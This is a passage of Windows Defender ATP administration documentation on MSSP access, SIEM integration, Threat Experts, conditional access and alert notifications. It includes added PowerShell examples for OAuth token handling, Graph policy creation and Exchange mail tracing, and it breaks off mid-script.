Fetch alerts through security information and event management (SIEM) tools
Before MSSPs can take these actions, the MSSP customer will need to grant access to their Windows Defender
ATP tenant so that the MSSP can access the portal.
Typically, MSSP customers take the initial configuration steps to grant MSSPs access to their Windows Defender Security Center tenant. After access is granted, the other configuration steps can be done by either the MSSP customer or the MSSP.
In general, the following configuration steps need to be taken:
Grant the MSSP access to Windows Defender Security Center
This action needs to be done by the MSSP customer. It grants the MSSP access to the MSSP customer's
Windows Defender ATP tenant.
Configure alert notifications sent to MSSPs
This action can be taken by either the MSSP customer or MSSP. This lets the MSSPs know what alerts they
need to address for the MSSP customer.
Fetch alerts from MSSP customer's tenant into SIEM system
This action is taken by the MSSP. It allows MSSPs to fetch alerts in SIEM tools.
Fetch alerts from MSSP customer's tenant using APIs
This action is taken by the MSSP. It allows MSSPs to fetch alerts using APIs.

Grant the MSSP access to the portal


NOTE
This set of steps is directed at the MSSP customer.
Only the MSSP customer can grant access to the portal.

As an MSSP customer, you'll need to take the following configuration steps to grant the MSSP access to Windows Defender Security Center.
Authentication and authorization of the MSSP user is built on top of Azure Active Directory (Azure AD) B2B functionality.
You'll need to take the following two steps:
Add MSSP user to your tenant as a guest user
Grant MSSP user access to Windows Defender Security Center
Add MSSP user to your tenant as a guest user
Add a user who is a member of the MSSP tenant to your tenant as a guest user.
To grant portal access to the MSSP, you must add the MSSP user to your Azure AD as a guest user. For more
information, see Add Azure Active Directory B2B collaboration users in the Azure portal.
Grant MSSP user access to Windows Defender Security Center
Grant the guest user access and permissions to your Windows Defender Security Center tenant.
Granting access to a guest user is done the same way as granting access to a user who is a member of your tenant.
If you're using basic permissions to access the portal, the guest user must be assigned a Security Administrator role in your tenant. For more information, see Use basic permissions to access the portal.
If you're using role-based access control (RBAC), the guest user must be added to the appropriate group or groups in your tenant. For more information on RBAC in Windows Defender ATP, see Manage portal access using RBAC.

NOTE
There is no difference between the Member user and Guest user roles from RBAC perspective.

It is recommended that dedicated groups are created for MSSPs to make authorization more manageable.
As an MSSP customer, you can always remove or modify the permissions granted to the MSSP by updating the Azure AD user groups.

Access the Windows Defender Security Center MSSP customer portal


NOTE
This set of steps is directed at the MSSP.

By default, MSSP customers access their Windows Defender Security Center tenant through the following URL:
https://securitycenter.windows.com .
MSSPs however, will need to use a tenant-specific URL in the following format:
https://securitycenter.windows.com?tid=customer_tenant_id to access the MSSP customer portal.

In general, MSSPs will need to be added to each of the MSSP customer's Azure AD that they intend to manage.
Use the following steps to obtain the MSSP customer tenant ID and then use the ID to access the tenant-specific
URL:
1. As an MSSP, sign in to Azure AD with your credentials.
2. Switch directory to the MSSP customer's tenant.
3. Select Azure Active Directory > Properties. You'll find the tenant ID in the Directory ID field.
4. Access the MSSP customer portal by replacing the customer_tenant_id value in the following URL:
https://securitycenter.windows.com?tid=customer_tenant_id .

Configure alert notifications that are sent to MSSPs


NOTE
This step can be done by either the MSSP customer or MSSP. MSSPs must be granted the appropriate permissions to
configure this on behalf of the MSSP customer.

After access to the portal is granted, alert notification rules can be created so that emails are sent to MSSPs when alerts associated with the tenant are created and the configured conditions are met.
For more information, see Create rules for alert notifications.
These check boxes must be checked:
Include organization name - The customer name will be added to email notifications
Include tenant-specific portal link - Alert link URL will have tenant specific parameter (tid=target_tenant_id)
that allows direct access to target tenant portal

Fetch alerts from MSSP customer's tenant into the SIEM system
NOTE
This action is taken by the MSSP.

To fetch alerts into your SIEM system you'll need to take the following steps:
Step 1: Create a third-party application
Step 2: Get access and refresh tokens from your customer's tenant
Step 3: Whitelist your application on Windows Defender Security Center
Step 1: Create an application in Azure Active Directory (Azure AD)
You'll need to create an application and grant it permissions to fetch alerts from your customer's Windows
Defender ATP tenant.
1. Sign in to the Azure AD portal.
2. Select Azure Active Directory > App registrations.
3. Click New application registration.
4. Specify the following values:
Name: <Tenant_name> SIEM MSSP Connector (replace Tenant_name with the tenant display name)
Application type: Web app / API
Sign-on URL: https://SiemMsspConnector
5. Click Create. The application is displayed in the list of applications you own.
6. Select the application, then click Settings > Properties.
7. Copy the value from the Application ID field.
8. Change the value in the App ID URI to: https://<domain_name>/SiemMsspConnector (replace <domain_name> with the tenant name).
9. Ensure that the Multi-tenanted field is set to Yes.
10. In the Settings panel, select Reply URLs and add the following URL:
https://localhost:44300/wdatpconnector .

11. Click Save.


12. Select Keys and specify the following values:
Description: Enter a description for the key.
Expires: Select In 1 year
13. Click Save. Copy the key value and store it in a safe place; it is displayed only once, and you'll need it in the next step. This key is the application's client secret, so handle it like a password.
Step 2: Get access and refresh tokens from your customer's tenant
This section guides you on how to use a PowerShell script to get the tokens from your customer's tenant. This
script uses the application from the previous step to get the access and refresh tokens using the OAuth
Authorization Code Flow.
After providing your credentials, you'll need to grant consent to the application so that the application is
provisioned in the customer's tenant.
1. Create a new folder and name it: MsspTokensAcquisition .
2. Download the LoginBrowser.psm1 module and save it in the MsspTokensAcquisition folder.

NOTE
In line 30, replace authorzationUrl with authorizationUrl .

3. Create a file with the following content and save it with the name MsspTokensAcquisition.ps1 in the folder:
param (
    [Parameter(Mandatory=$true)][string]$clientId,
    [Parameter(Mandatory=$true)][string]$secret,
    [Parameter(Mandatory=$true)][string]$tenantId
)
# Force TLS 1.2 for the token request
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# Load our Login Browser function
Import-Module .\LoginBrowser.psm1

# Configuration parameters
$login = "https://login.microsoftonline.com"
$redirectUri = "https://SiemMsspConnector"
$resourceId = "https://graph.windows.net"

Write-Host 'Prompt the user for credentials, to get an authorization code'
$authorizationUrl = ("{0}/{1}/oauth2/authorize?prompt=select_account&response_type=code&client_id={2}&redirect_uri={3}&resource={4}" -f $login, $tenantId, $clientId, $redirectUri, $resourceId)
Write-Host "authorizationUrl: $authorizationUrl"

# Fake a proper endpoint for the Redirect URI and capture the authorization code from it
$code = LoginBrowser $authorizationUrl $redirectUri

# Acquire token using the authorization code
$Body = @{
    grant_type    = 'authorization_code'
    client_id     = $clientId
    code          = $code
    redirect_uri  = $redirectUri
    resource      = $resourceId
    client_secret = $secret
}

$tokenEndpoint = "$login/$tenantId/oauth2/token?"
$Response = Invoke-RestMethod -Method Post -Uri $tokenEndpoint -Body $Body
$token = $Response.access_token
$refreshToken = $Response.refresh_token

# Both tokens are written to the console in clear text
Write-Host " ----------------------------------- TOKEN ---------------------------------- "
Write-Host $token

Write-Host " ----------------------------------- REFRESH TOKEN ---------------------------------- "
Write-Host $refreshToken

4. Open an elevated PowerShell command prompt in the MsspTokensAcquisition folder.
5. Run the following command: Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process (the -Scope Process argument limits the bypass to this session instead of changing the machine-wide policy).
6. Enter the following command:
.\MsspTokensAcquisition.ps1 -clientId <client_id> -secret <app_key> -tenantId <customer_tenant_id>
Replace <client_id> with the Application ID you got from the previous step.
Replace <app_key> with the application key you created in the previous step.
Replace <customer_tenant_id> with your customer's tenant ID.
7. You'll be asked to provide your credentials and consent. Ignore the page redirect.
8. In the PowerShell window, you'll receive an access token and a refresh token. Save the refresh token to configure your SIEM connector. Both tokens are printed in clear text, so treat the console output (and any PowerShell transcript or console history) as sensitive and clear it once the refresh token is stored.
Step 3: Whitelist your application on Windows Defender Security Center
You'll need to whitelist the application you created in Windows Defender Security Center.
You'll need to have Manage portal system settings permission to whitelist the application. Otherwise, you'll
need to request your customer to whitelist the application for you.
1. Go to https://securitycenter.windows.com?tid=<customer_tenant_id> (replace <customer_tenant_id> with the customer's tenant ID).
2. Click Settings > SIEM.
3. Select the MSSP tab.
4. Enter the Application ID from the first step and your Tenant ID.
5. Click Authorize application.
You can now download the relevant configuration file for your SIEM and connect to the Windows Defender ATP
API. For more information see, Pull alerts to your SIEM tools.
In the ArcSight configuration file / Splunk Authentication Properties file you will have to enter your application key manually by setting the secret value.
Instead of acquiring a refresh token in the portal, use the script from the previous step to acquire a refresh token (or acquire it by other means).
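The refresh token saved in Step 2 is what the SIEM connector redeems for a short-lived access token on each run. As an added example that is not part of the original page or of Microsoft's connector code, the following PowerShell performs that redemption directly, using the standard OAuth 2.0 refresh_token grant against the same Azure AD v1 token endpoint and resource the acquisition script above already uses. The parameter names and the placeholder values are assumptions; it is useful for checking that a stored refresh token is still valid before wiring it into ArcSight or Splunk, and for seeing what a revoked token or rotated client secret looks like from the connector's side.

```powershell
# Added example: redeem the refresh token from Step 2 for a fresh access token.
# OAuth 2.0 refresh_token grant against the Azure AD v1 endpoint (same endpoint and
# resource as MsspTokensAcquisition.ps1). All parameters are placeholders supplied by the caller.
param (
    [Parameter(Mandatory=$true)][string]$clientId,      # Application ID from Step 1
    [Parameter(Mandatory=$true)][string]$secret,        # application key from Step 1
    [Parameter(Mandatory=$true)][string]$tenantId,      # customer tenant ID
    [Parameter(Mandatory=$true)][string]$refreshToken   # refresh token saved in Step 2
)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

$login      = "https://login.microsoftonline.com"
$resourceId = "https://graph.windows.net"   # the resource the original token was issued for

$body = @{
    grant_type    = 'refresh_token'
    client_id     = $clientId
    client_secret = $secret
    refresh_token = $refreshToken
    resource      = $resourceId
}

try {
    $response = Invoke-RestMethod -Method Post -Uri "$login/$tenantId/oauth2/token" -Body $body
} catch {
    # A revoked or expired refresh token, or a rotated client secret, fails here with an
    # AADSTS error in the response body. Surface it rather than continuing with no token.
    throw "Token refresh failed for tenant $tenantId : $($_.ErrorDetails.Message)"
}

# Azure AD may hand back a rotated refresh token with the new access token; persist that
# one for the next run, because the previous refresh token can eventually stop working.
$accessToken     = $response.access_token
$newRefreshToken = $response.refresh_token
$expiresAt       = (Get-Date).AddSeconds([int]$response.expires_in)

Write-Output "Access token obtained; it expires at $expiresAt."

# Return the tokens as SecureStrings instead of printing them to the console.
[pscustomobject]@{
    AccessToken  = ConvertTo-SecureString $accessToken -AsPlainText -Force
    RefreshToken = ConvertTo-SecureString $newRefreshToken -AsPlainText -Force
    ExpiresAt    = $expiresAt
}
```

Unlike the acquisition script, this one never writes a token to the console, so it can be run from a scheduled task or a connector health check without leaving credentials in transcripts.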

Fetch alerts from MSSP customer's tenant using APIs


For information on how to fetch alerts using REST API, see Pull alerts using REST API.

Related topics
Use basic permissions to access the portal
Manage portal access using RBAC
Pull alerts to your SIEM tools
Pull alerts using REST API
Configure and manage Microsoft Threat Experts capabilities
4/30/2019 • 7 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

Before you begin


To experience the full Microsoft Threat Experts targeted attack notification capability in Windows Defender ATP, and to preview the experts-on-demand capability, you need to have a valid Premier customer service and support account. Premier charges will not be incurred for the capability while it is in preview, but charges will apply once the capability is generally available.
You also need to ensure that you have Windows Defender ATP deployed in your environment with machines enrolled, and not just in a laboratory set-up.

Register to Microsoft Threat Experts managed threat hunting service


If you're already a Windows Defender ATP customer, you can apply through the Windows Defender ATP portal.
1. From the navigation pane, go to Settings > General > Advanced features > Microsoft Threat Experts.
2. Click Apply.

3. Enter your name and email address so that Microsoft can get back to you on your application.
4. Read the privacy statement, then click Submit when you're done. You will receive a welcome email once
your application is approved.

5. From the navigation pane, go to Settings > General > Advanced features to turn the Threat Experts
toggle on. Click Save preferences.

Receive targeted attack notification from Microsoft Threat Experts


You can receive targeted attack notification from Microsoft Threat Experts through the following:
The Windows Defender ATP portal's Alerts dashboard
Your email, if you choose to configure it
To receive targeted attack notifications through email, you need to create an email notification rule.
Create an email notification rule
You can create rules to send email notifications for notification recipients. See Configure alert notifications to
create, edit, delete, or troubleshoot email notification, for details.

View the targeted attack notification


You'll start receiving targeted attack notification from Microsoft Threat Experts in your email after you have
configured your system to receive email notification.
1. Click the link in the email to go to the corresponding alert context in the dashboard tagged with Threat
experts.
2. From the dashboard, select the same alert topic that you got from the email, to view the details.
Ask a Microsoft threat expert about suspicious cybersecurity activities in your organization
NOTE
The Microsoft Threat Experts' experts-on-demand capability is still in preview. You can only use the experts-on-demand
capability if you have applied for preview and your application has been approved.

You can partner with Microsoft Threat Experts who can be engaged directly from within the Windows Defender
Security Center for timely and accurate response. Experts provide insights needed to better understand complex
threats, targeted attack notifications that you get, or if you need more information about the alerts, a potentially
compromised machine, or a threat intelligence context that you see on your portal dashboard.
1. Navigate to the portal page with the relevant information that you'd like to investigate, for example, the
Incident page. Ensure that the page for the relevant alert or machine is in view before raising an inquiry.
2. From the upper right-hand menu, click ?, then select Ask a threat expert.
3. Asking a threat expert is a two-step process: you need to provide the necessary information and open a
support ticket.
Step 1: Provide information
a. Provide enough information to give the Microsoft Threat Experts enough context to start the
investigation. Select the inquiry category from the Provide information > Inquiry details drop-down
menu.
b. Enter the additional details to give the threat experts more context of what you’d like to investigate. Click
Next, and it takes you to the Open support ticket tab.
c. Remember to use the ID number from the Open a support ticket tab page and include it in the details you provide in the subsequent Customer Services and Support (CSS) pages.
Step 2: Open a support ticket

NOTE
To experience the full Microsoft Threat Experts preview capability in Windows Defender ATP, you need to have a
Premier customer service and support account. However, you will not be charged for the Experts-on-demand service
during the preview.

a. In the New support request customer support page, select the following from the dropdown menu and
then click Next:
Select the product family: Security
Select a product: Microsoft Threat Experts
Select a category that best describes the issue: Windows Defender ATP
Select a problem that best describes the issue: Choose according to your inquiry category
b. Fill out the fields with the necessary information about the issue and use the auto-generated ID when you open a Customer Services and Support (CSS) ticket. Then, click Next.
c. In the Select a support plan page, select Professional No Charge.
d. The severity of your issue has been pre-selected by default, per the support plan, Professional No
Charge, that you'll use for this public preview. Select the time zone by which you'd like to receive the
correspondence. Then, click Next.
e. Verify your contact details and add another if necessary. Then, click Next.
f. Review the summary of your support request, and update if necessary. Make sure that you read and
understand the Microsoft Services Agreement and Privacy Statement. Then, click Submit. You will see
the confirmation page indicating the response time and your support request number.

Sample questions to ask Microsoft Threat Experts


Alert information
We see a new type of alert for a living-off-the-land binary: [AlertID]. Can you tell us something more about this alert and how we can investigate further?
We've observed two similar attacks which try to execute malicious PowerShell scripts but generate different alerts. One is "Suspicious Powershell command line" and the other is "A malicious file was detected based on indication provided by O365". What is the difference?
I received an odd alert today for an abnormal number of failed logins from a high-profile user's device. I cannot find any further evidence around these sign-in attempts. How can Windows Defender see these attempts? What type of sign-ins are being monitored?
Can you give more context or insights about this alert: “Suspicious behavior by a system utility was observed”.
Possible machine compromise
Can you please help answer why we see “Unknown process observed?” This is seen quite frequently on many
machines and we would appreciate input on whether this is related to malicious activity.
Can you help validate a possible compromise on the following system on [date] with similar behaviors as the
previous [malware name] malware detection on the same system in [month]?
Threat intelligence details
This morning, we detected a phishing email that delivered a malicious Word document to a user. This caused a
series of suspicious events which triggered multiple Windows Defender alerts for [malware name] malware.
Do you have any information on this malware? If yes, can you please send me a link?
I recently saw a [social media reference e.g. Twitter or blog] post about a threat that is targeting my industry.
Can you help me understand what protection Windows Defender ATP provides against this threat actor?
Microsoft Threat Experts’ alert communications
Can your incident response team help us address the targeted attack notification that we got?
I received this targeted attack notification from Microsoft Threat Experts. We don’t have our own incident
response team. What can we do now, and how can we contain the incident?
I received a targeted attack notification from Microsoft Threat Experts. What data can you provide to us that
we can pass on to our incident response team?

NOTE
Microsoft Threat Experts is a managed cybersecurity hunting service and not an incident response service. However,
the experts can seamlessly transition the investigation to Microsoft Cybersecurity Solutions Group (CSG)'s Detection
and Response Team (DART) services, when necessary. You can also opt to engage your own incident response
team to address issues that require an incident response.

Scenario
Receive a progress report about your managed hunting inquiry
Response from Microsoft Threat Experts varies according to your inquiry. Within two days of your Ask a threat expert
submission, they will email you a progress report that places the investigation status in one of the following
categories:
More information is needed to continue with the investigation
A file or several file samples are needed to determine the technical context
Investigation requires more time
Initial information was enough to conclude the investigation
It is crucial to respond in a timely manner to keep the investigation moving. See the Premier customer service and
support service level agreement for details.
Configure conditional access in Windows Defender ATP
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
This section guides you through all the steps you need to take to properly implement conditional access.
Before you begin

WARNING
It's important to note that Azure AD registered devices are not supported in this scenario.
Only Intune enrolled devices are supported.

You need to make sure that all your devices are enrolled in Intune. You can use any of the following options to
enroll devices in Intune:
IT Admin: For more information on how to enable auto-enrollment, see Windows Enrollment
End-user: For more information on how to enroll your Windows 10 device in Intune, see Enroll your Windows
10 device in Intune
End-user alternative: For more information on joining an Azure AD domain, see Set up Azure Active Directory
joined devices.
There are steps you'll need to take in Windows Defender Security Center, the Intune portal, and Azure AD portal.

NOTE
You'll need a Microsoft Intune environment, with Intune managed and Azure AD joined Windows 10 devices.

Take the following steps to enable conditional access:


Step 1: Turn on the Microsoft Intune connection from Windows Defender Security Center
Step 2: Turn on the Windows Defender ATP integration in Intune
Step 3: Create the compliance policy in Intune
Step 4: Assign the policy
Step 5: Create an Azure AD conditional access policy
Step 1: Turn on the Microsoft Intune connection
1. In the navigation pane, select Settings > Advanced features > Microsoft Intune connection.
2. Toggle the Microsoft Intune setting to On.
3. Click Save preferences.
Step 2: Turn on the Windows Defender ATP integration in Intune
1. Sign in to the Azure portal.
2. Select Device compliance > Windows Defender ATP.
3. Set Connect Windows 10.0.15063+ devices to Windows Defender Advanced Threat Protection to On.
4. Click Save.
Step 3: Create the compliance policy in Intune
1. In the Azure portal, select All services, filter on Intune, and select Microsoft Intune.
2. Select Device compliance > Policies > Create policy.
3. Enter a Name and Description.
4. In Platform, select Windows 10 and later.
5. In the Device Health settings, set Require the device to be at or under the Device Threat Level to
your preferred level:
Secured: This level is the most secure. The device cannot have any existing threats and still access
company resources. If any threats are found, the device is evaluated as noncompliant.
Low: The device is compliant if only low-level threats exist. Devices with medium or high threat levels
are not compliant.
Medium: The device is compliant if the threats found on the device are low or medium. If high-level
threats are detected, the device is determined as noncompliant.
High: This level is the least secure, and allows all threat levels. Devices with high, medium, or low
threat levels are all considered compliant.
6. Select OK, and Create to save your changes (and create the policy).
Step 4: Assign the policy
1. In the Azure portal, select All services, filter on Intune, and select Microsoft Intune.
2. Select Device compliance > Policies> select your Windows Defender ATP compliance policy.
3. Select Assignments.
4. Include or exclude your Azure AD groups to assign them the policy.
5. To deploy the policy to the groups, select Save. The user devices targeted by the policy are evaluated for
compliance.
Step 5: Create an Azure AD conditional access policy
1. In the Azure portal, open Azure Active Directory > Conditional access > New policy.
2. Enter a policy Name, and select Users and groups. Use the Include or Exclude options to add your groups for
the policy, and select Done.
3. Select Cloud apps, and choose which apps to protect. For example, choose Select apps, and select Office
365 SharePoint Online and Office 365 Exchange Online. Select Done to save your changes.
4. Select Conditions > Client apps to apply the policy to apps and browsers. For example, select Yes, and
then enable Browser and Mobile apps and desktop clients. Select Done to save your changes.
5. Select Grant to apply conditional access based on device compliance. For example, select Grant access >
Require device to be marked as compliant. Choose Select to save your changes.
6. Select Enable policy, and then Create to save your changes.
For more information, see Enable Windows Defender ATP with conditional access in Intune.
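Steps 3 to 5 above are portal click-throughs, which makes the resulting configuration hard to review or reproduce. The following script is an added example, not part of this documentation or of the Windows Defender ATP product, that creates the same compliance policy, assigns it, and creates the conditional access policy through Microsoft Graph with the Microsoft Graph PowerShell SDK. It assumes that SDK is installed, that the Intune connection and the Windows Defender ATP integration (Steps 1 and 2) are already switched on, and that the group object ID is a placeholder you replace with your own pilot group. The conditional access policy is created in report-only mode so that the Azure AD sign-in logs show who would have been blocked before the state is changed to enabled.

```powershell
# Added example (not from the Windows Defender ATP documentation): Steps 3-5 of
# the conditional access setup expressed as Microsoft Graph calls.
# Assumptions: Microsoft.Graph PowerShell SDK installed; Steps 1-2 already done;
# $PilotGroupId is a placeholder for the object id of your own pilot group.
#Requires -Modules Microsoft.Graph.Authentication

$PilotGroupId = '<object-id-of-pilot-group>'   # placeholder, replace before running
$ThreatLevel  = 'low'                          # one of: secured, low, medium, high (see Step 3)

$scopes = @(
    'DeviceManagementConfiguration.ReadWrite.All',
    'Policy.ReadWrite.ConditionalAccess',
    'Policy.Read.All',
    'Application.Read.All'
)
Connect-MgGraph -Scopes $scopes

# Step 3: Windows 10 compliance policy that requires the device threat level
# reported by Windows Defender ATP to be at or under $ThreatLevel.
$compliancePolicy = @{
    '@odata.type'                               = '#microsoft.graph.windows10CompliancePolicy'
    displayName                                 = 'WDATP - device threat level'
    description                                 = 'Noncompliant when the reported threat level exceeds the chosen level'
    deviceThreatProtectionEnabled               = $true
    deviceThreatProtectionRequiredSecurityLevel = $ThreatLevel
    # Graph requires at least one scheduled action for noncompliance; block immediately.
    scheduledActionsForRule = @(
        @{
            ruleName                      = 'PasswordRequired'
            scheduledActionConfigurations = @(
                @{ actionType = 'block'; gracePeriodHours = 0 }
            )
        }
    )
}
$policy = Invoke-MgGraphRequest -Method POST `
    -Uri 'https://graph.microsoft.com/v1.0/deviceManagement/deviceCompliancePolicies' `
    -Body ($compliancePolicy | ConvertTo-Json -Depth 6)

# Step 4: assign the compliance policy to the pilot group only.
$assignment = @{
    assignments = @(
        @{ target = @{ '@odata.type' = '#microsoft.graph.groupAssignmentTarget'; groupId = $PilotGroupId } }
    )
}
Invoke-MgGraphRequest -Method POST `
    -Uri "https://graph.microsoft.com/v1.0/deviceManagement/deviceCompliancePolicies/$($policy.id)/assign" `
    -Body ($assignment | ConvertTo-Json -Depth 6)

# Step 5: conditional access policy. Report-only first: sign-in logs record the
# would-be result without locking anyone out; switch state to 'enabled' afterwards.
$caPolicy = @{
    displayName = 'Require WDATP-compliant device for Exchange and SharePoint'
    state       = 'enabledForReportingButNotEnforced'
    conditions  = @{
        users        = @{ includeGroups = @($PilotGroupId) }
        # Well-known first-party application ids: Office 365 Exchange Online, Office 365 SharePoint Online.
        applications = @{ includeApplications = @(
            '00000002-0000-0ff1-ce00-000000000000',
            '00000003-0000-0ff1-ce00-000000000000'
        ) }
        clientAppTypes = @('browser', 'mobileAppsAndDesktopClients')
        platforms      = @{ includePlatforms = @('windows') }
    }
    grantControls = @{ operator = 'OR'; builtInControls = @('compliantDevice') }
}
Invoke-MgGraphRequest -Method POST `
    -Uri 'https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies' `
    -Body ($caPolicy | ConvertTo-Json -Depth 6)
```

Keeping the policy definitions in a script also gives you a diffable record of which threat level and which applications the organization decided to gate, which the portal does not provide.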

Want to experience Windows Defender ATP? Sign up for a free trial.


Configure Microsoft Cloud App Security in Windows Defender ATP
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

To benefit from Windows Defender Advanced Threat Protection (ATP) cloud app discovery signals, turn on
Microsoft Cloud App Security integration.

NOTE
This feature will be available with an E5 license for Enterprise Mobility + Security on machines running Windows 10, version
1709 (OS Build 16299.1085 with KB4493441), Windows 10, version 1803 (OS Build 17134.704 with KB4493464), Windows
10, version 1809 (OS Build 17763.379 with KB4489899) or later Windows 10 versions.

1. In the navigation pane, select Preferences setup > Advanced features.


2. Select Microsoft Cloud App Security and switch the toggle to On.
3. Click Save preferences.
Once activated, Windows Defender ATP will immediately start forwarding discovery signals to Cloud App
Security.

View the data collected


1. Browse to the Cloud App Security portal.
2. Navigate to the Cloud Discovery dashboard.
3. Select Win10 Endpoint Users report, which contains the data coming from Windows Defender ATP.

This report is similar to the existing discovery report with one major difference: you now get visibility into the
machine context.
Notice the new Machines tab, which lets you view the data split by device. It is available on the main report page
and on any subpage (for example, when drilling down to a specific cloud app).
For more information about cloud discovery, see Working with discovered apps.
If you are interested in trying Microsoft Cloud App Security, see Microsoft Cloud App Security Trial.

Related topic
Microsoft Cloud App Security integration
Configure information protection in Windows
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Learn how you can use Windows Defender ATP to expand the coverage of Windows Information Protection (WIP)
to protect files based on their label, regardless of their origin.

TIP
Read our blog post about how Windows Defender ATP integrates with Microsoft Information Protection to discover, protect,
and monitor sensitive data on Windows devices.

Prerequisites
Endpoints need to be on Windows 10, version 1809 or later
You'll need the appropriate license to leverage the Windows Defender ATP and Azure Information Protection
integration
Your tenant needs to be onboarded to Azure Information Protection analytics. For more information, see
Configure a Log Analytics workspace for the reports

Configuration steps
1. Define a WIP policy and assign it to the relevant devices. For more information, see Protect your enterprise
data using Windows Information Protection (WIP). If WIP is already configured on the relevant devices, skip
this step.
2. Define which labels need to get WIP protection in Office 365 Security and Compliance.
a. Go to: Classifications > Labels.
b. Create a new label or edit an existing one.
c. In the configuration wizard, go to the 'Data loss prevention' tab and enable WIP.

d. Repeat for every label that you want to get WIP applied to in Windows.
After completing these steps, Windows Defender ATP will automatically identify labeled documents stored on the
device and enable WIP on them.
NOTE
The Windows Defender ATP configuration is pulled every 15 minutes. Allow up to 30 minutes for the new policy to take
effect and ensure that the endpoint is online. Otherwise, it will not receive the policy.
Data forwarded to Azure Information Protection is stored in the same location as your other Azure Information
Protection data.

Related topic
Information protection in Windows overview
Configure Windows Defender Security Center settings
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Use the Settings menu to modify general settings, advanced features, enable the preview experience, email
notifications, and the custom threat intelligence feature.

In this section
TOPIC DESCRIPTION

General settings Modify your general settings that were previously defined as
part of the onboarding process.

Permissions Manage portal access using RBAC as well as machine groups.

APIs Enable the threat intel and SIEM integration.

Rules Configure suppression rules and automation settings.

Machine management Onboard and offboard machines.


Update data retention settings for Windows Defender ATP
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


During the onboarding process, a wizard takes you through the general settings of Windows Defender ATP. After
onboarding, you might want to update the data retention settings.
1. In the navigation pane, select Settings > Data retention.
2. Select the data retention duration from the drop-down list.

NOTE
Other settings are not editable.

3. Click Save preferences.

Related topics
Update data retention settings
Configure alert notifications in Windows Defender ATP
Enable and create Power BI reports using Windows Defender ATP data
Enable Secure Score security controls
Configure advanced features
Configure alert notifications in Windows Defender ATP
4/8/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


You can configure Windows Defender ATP to send email notifications to specified recipients for new alerts. This
feature enables you to identify a group of individuals who will immediately be informed and can act on alerts
based on their severity.

NOTE
Only users with 'Manage security settings' permissions can configure email notifications. If you've chosen to use basic
permissions management, users with Security Administrator or Global Administrator roles can configure email notifications.

You can set the alert severity levels that trigger notifications. You can also add or remove recipients of the email
notification. New recipients get notified about alerts encountered after they are added. For more information
about alerts, see View and organize the Alerts queue.
If you're using role-based access control (RBAC), recipients will only receive notifications based on the machine
groups that were configured in the notification rule. Users with the proper permission can only create, edit, or
delete notifications that are limited to their machine group management scope. Only users assigned to the Global
administrator role can manage notification rules that are configured for all machine groups.
The email notification includes basic information about the alert and a link to the portal where you can do further
investigation.

Create rules for alert notifications


You can create rules that determine which machines and alert severities trigger email notifications, and who
receives them.
1. In the navigation pane, select Settings > Alert notifications.
2. Click Add notification rule.
3. Specify the General information:
Rule name - Specify a name for the notification rule.
Include organization name - Specify the customer name that appears on the email notification.
Include tenant-specific portal link - Adds a link with the tenant ID to allow access to a specific tenant.
Include machine information - Includes the machine name in the email alert body.
NOTE
This information might be processed by recipient mail servers that are not in the geographic location you
have selected for your Windows Defender ATP data.

Machines - Choose whether to notify recipients for alerts on all machines (Global administrator
role only) or on selected machine groups. For more information, see Create and manage machine
groups.
Alert severity - Choose the alert severity level.
4. Click Next.
5. Enter the recipient's email address, then click Add recipient. You can add multiple email addresses.
6. Check that email recipients are able to receive the email notifications by selecting Send test email.
7. Click Save notification rule.
Here's an example email notification:

Edit a notification rule


1. Select the notification rule you'd like to edit.
2. Update the General and Recipient tab information.
3. Click Save notification rule.

Delete notification rule


1. Select the notification rule you'd like to delete.
2. Click Delete.

Troubleshoot email notifications for alerts


This section lists various issues that you may encounter when using email notifications for alerts.
Problem: Intended recipients report they are not getting the notifications.
Solution: Make sure that the notifications are not blocked by email filters:
1. Check that the Windows Defender ATP email notifications are not sent to the Junk Email folder. Mark them as
Not junk.
2. Check that your email security product is not blocking the email notifications from Windows Defender ATP.
3. Check your email application rules that might be catching and moving your Windows Defender ATP email
notifications.
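The three checks above can be run from the Exchange Online side for a single recipient instead of asking the user to look through their mailbox. The script below is an added example, not part of this documentation; it assumes the ExchangeOnlineManagement module, an account with Exchange admin rights, and that the notification sender address (a placeholder here) is taken from a notification or test email that did arrive. It traces recent messages from that sender (check 2: a status of FilteredAsSpam or Quarantined points at the mail filtering product rather than the portal), reads the mailbox junk-mail settings (check 1), and lists the enabled inbox rules that move or delete mail (check 3).

```powershell
# Added example (not from the Windows Defender ATP documentation): mailbox-side
# troubleshooting for a recipient who reports missing alert notifications.
# Assumptions: ExchangeOnlineManagement module; Exchange admin permissions;
# $NotificationSender is a placeholder for the real sender address.
#Requires -Modules ExchangeOnlineManagement

param(
    [Parameter(Mandatory)] [string] $Recipient,
    [string] $NotificationSender = '<wdatp-notification-sender-address>',  # placeholder
    [int]    $Days = 7
)

Connect-ExchangeOnline -ShowBanner:$false

# Check 2: did Exchange Online accept the messages, and where did filtering send them?
# Delivered = reached the mailbox (look at rules/junk next); FilteredAsSpam = Junk Email
# folder; Failed or Quarantined = blocked by the email security product.
$trace = Get-MessageTrace -RecipientAddress $Recipient -SenderAddress $NotificationSender `
    -StartDate (Get-Date).AddDays(-$Days) -EndDate (Get-Date)
if (-not $trace) {
    Write-Host "No mail from $NotificationSender to $Recipient in the last $Days days; check the notification rule's recipients first."
}
$trace | Group-Object Status | Select-Object Name, Count | Format-Table -AutoSize

# Check 1: junk mail configuration. A blocked sender explains a missing message; a
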